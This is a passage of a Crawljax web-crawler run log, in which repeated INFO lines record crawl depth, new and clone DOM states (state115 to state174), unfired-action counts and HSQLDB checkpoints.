states with unfired actions 944247 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 945473 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 946839 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state115 added to the StateMachine. 946839 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 3 946880 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 31 states with unfired actions 948463 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state116 added to the StateMachine. 948463 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 948481 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 31 states with unfired actions 950845 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 952053 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 953401 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 954716 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state117 added to the StateMachine. 954716 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 954725 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 31 states with unfired actions 957034 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 958271 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 959491 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 960888 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state118 added to the StateMachine. 960888 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 960907 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 31 states with unfired actions 963282 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 964485 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 965919 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state119 added to the StateMachine. 965919 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 3 965974 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 30 states with unfired actions 968486 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 969723 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 970966 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 972416 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state120 added to the StateMachine. 972416 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 972441 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 30 states with unfired actions 974911 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 976135 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 977383 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 981212 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 982440 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 983689 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 985209 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - CLONE State detected: state121 and state37 are the same. 985214 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 30 states with unfired actions 987560 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 988786 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 990059 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 991543 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - CLONE State detected: state122 and state37 are the same. 991547 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 30 states with unfired actions 993898 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 995124 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 996547 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state123 added to the StateMachine. 996548 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 3 996576 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 31 states with unfired actions 997951 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - CLONE State detected: state124 and state14 are the same. 997956 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 31 states with unfired actions 1000297 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 1001519 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 1002742 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 1004136 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - CLONE State detected: state125 and state99 are the same. 1004187 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 31 states with unfired actions 1006590 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 1007808 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 1009037 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 1010409 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - CLONE State detected: state126 and state14 are the same. 1010418 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 31 states with unfired actions 1012960 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 1014190 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 1015485 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 1016836 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - CLONE State detected: state127 and state43 are the same. 1016847 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 30 states with unfired actions 1019192 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 1020431 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 1021663 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 1023063 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - CLONE State detected: state128 and state14 are the same. 1023068 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 30 states with unfired actions 1025400 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 1026631 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 1028404 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state129 added to the StateMachine. 1028404 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 3 1028557 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 31 states with unfired actions 1030675 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state130 added to the StateMachine. 1030675 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 1030685 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 31 states with unfired actions 1032107 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - Checkpoint start 1032107 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - checkpointClose start 1032121 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - dataFileCache commit start 1033629 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - checkpointClose end 1033631 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - Checkpoint end 1034762 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 1035990 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 1037500 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 1039576 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state131 added to the StateMachine. 1039576 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 1039606 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 31 states with unfired actions 1041989 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 1043329 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 1044878 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 1046956 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - CLONE State detected: state132 and state99 are the same. 1046959 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 31 states with unfired actions 1049269 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 1050534 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 1052047 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 1053838 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state133 added to the StateMachine. 1053838 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 1053855 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 31 states with unfired actions 1056278 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 1057605 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 1059148 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 1060922 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - CLONE State detected: state134 and state14 are the same. 1060926 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 31 states with unfired actions 1063602 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 1064849 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 1066284 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 1068244 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - CLONE State detected: state135 and state26 are the same. 1068257 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 31 states with unfired actions 1070693 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 1071959 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 1073276 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state136 added to the StateMachine. 1073276 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 3 1073305 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 32 states with unfired actions 1074794 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state137 added to the StateMachine. 1074795 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 1074869 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 32 states with unfired actions 1077346 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 1078592 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 1079876 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 1081236 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state138 added to the StateMachine. 1081236 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 1081256 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 32 states with unfired actions 1083692 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 1084913 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 1086078 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 1087315 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state139 added to the StateMachine. 1087315 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 1087325 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 32 states with unfired actions 1089640 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 1090835 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 1092009 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 1093230 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state140 added to the StateMachine. 1093230 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 1093239 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 32 states with unfired actions 1095524 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 1096717 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 1097886 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 1099128 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state141 added to the StateMachine. 1099128 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 1099136 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 32 states with unfired actions 1101417 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 1102589 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 1103801 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 1105032 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - CLONE State detected: state142 and state109 are the same. 1105035 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 32 states with unfired actions 1107330 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 1108508 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 1109681 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 1110911 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state143 added to the StateMachine. 1110912 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 1110920 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 32 states with unfired actions 1113363 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 1114582 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 1115759 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 1116962 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state144 added to the StateMachine. 1116962 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 1116970 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 32 states with unfired actions 1119345 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 1120554 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 1121737 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 1122950 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state145 added to the StateMachine. 1122951 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 1122967 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 32 states with unfired actions 1125214 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 1126410 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 1127584 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 1128823 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state146 added to the StateMachine. 1128823 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 1128832 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 32 states with unfired actions 1131071 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 1132257 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 1133448 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 1134834 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state147 added to the StateMachine. 1134834 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 1134852 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 32 states with unfired actions 1137150 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 1138357 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 1139544 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 1140837 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state148 added to the StateMachine. 1140838 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 1140846 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 32 states with unfired actions 1143100 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 1144398 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 1145660 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state149 added to the StateMachine. 1145660 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 3 1145682 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 33 states with unfired actions 1146920 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - CLONE State detected: state150 and state116 are the same. 1146924 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 33 states with unfired actions 1149175 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 1150333 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 1151528 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 1152837 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - CLONE State detected: state151 and state116 are the same. 1152841 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 33 states with unfired actions 1155093 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 1156265 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 1157476 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 1158701 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state152 added to the StateMachine. 1158701 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 1158719 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 33 states with unfired actions 1160982 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 1162164 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 1163350 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 1164559 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state153 added to the StateMachine. 1164559 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 1164567 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 33 states with unfired actions 1166815 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 1167967 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 1169233 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 1170705 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state154 added to the StateMachine. 1170705 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 1170730 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 33 states with unfired actions 1172985 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 1174150 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 1176426 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 1177786 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - CLONE State detected: state155 and state99 are the same. 1177790 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 33 states with unfired actions 1180052 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 1181221 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 1182460 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 1185991 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 1187288 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 1188495 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 1191084 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - CLONE State detected: state157 and state37 are the same. 1191087 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 33 states with unfired actions 1193350 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 1194541 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 1195800 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state158 added to the StateMachine. 1195800 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 3 1195817 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 34 states with unfired actions 1197079 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - CLONE State detected: state159 and state130 are the same. 1197083 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 34 states with unfired actions 1199301 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 1200563 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 1201774 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 1203056 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state160 added to the StateMachine. 1203056 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 1203074 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 34 states with unfired actions 1205307 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 1206468 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 1207747 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 1209054 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - CLONE State detected: state161 and state14 are the same. 1209066 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 34 states with unfired actions 1211299 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 1212482 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 1213709 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 1214992 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state162 added to the StateMachine. 1214993 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 1215001 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 33 states with unfired actions 1217242 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 1218423 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 1219666 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 1220953 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - CLONE State detected: state163 and state64 are the same. 1220957 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 33 states with unfired actions 1223201 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 1224360 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 1225981 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state164 added to the StateMachine. 1225982 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 3 1226097 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 34 states with unfired actions 1227739 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state165 added to the StateMachine. 1227739 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 1227749 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 34 states with unfired actions 1229993 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 1231169 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 1232546 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 1234679 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state166 added to the StateMachine. 1234679 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 1234697 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 34 states with unfired actions 1236948 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 1238138 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 1239472 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 1241193 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state167 added to the StateMachine. 1241193 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 1241210 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 34 states with unfired actions 1243489 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 1244676 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 1246049 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 1247601 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - CLONE State detected: state168 and state99 are the same. 1247605 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 34 states with unfired actions 1249878 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 1251148 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 1252563 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 1254141 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - CLONE State detected: state169 and state14 are the same. 1254145 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 34 states with unfired actions 1256725 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 1257944 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 1259323 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 1261064 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - CLONE State detected: state170 and state43 are the same. 1261068 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 34 states with unfired actions 1263404 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 1264587 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 1265918 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 1266627 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - Checkpoint start 1266628 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - checkpointClose start 1266635 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - dataFileCache commit start 1267561 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state171 added to the StateMachine. 1267561 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 1267586 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 34 states with unfired actions 1267632 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - checkpointClose end 1267635 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - Checkpoint end 1269932 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 1271120 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 1272336 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state172 added to the StateMachine. 1272336 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 3 1272355 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 35 states with unfired actions 1273592 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state173 added to the StateMachine. 1273592 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 1273598 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 36 states with unfired actions 1274934 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - CLONE State detected: state174 and state46 are the same. 1274938 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 36 states with unfired actions 1277216 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 1278404 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 1279582 [pool-2-thread-2] INFO 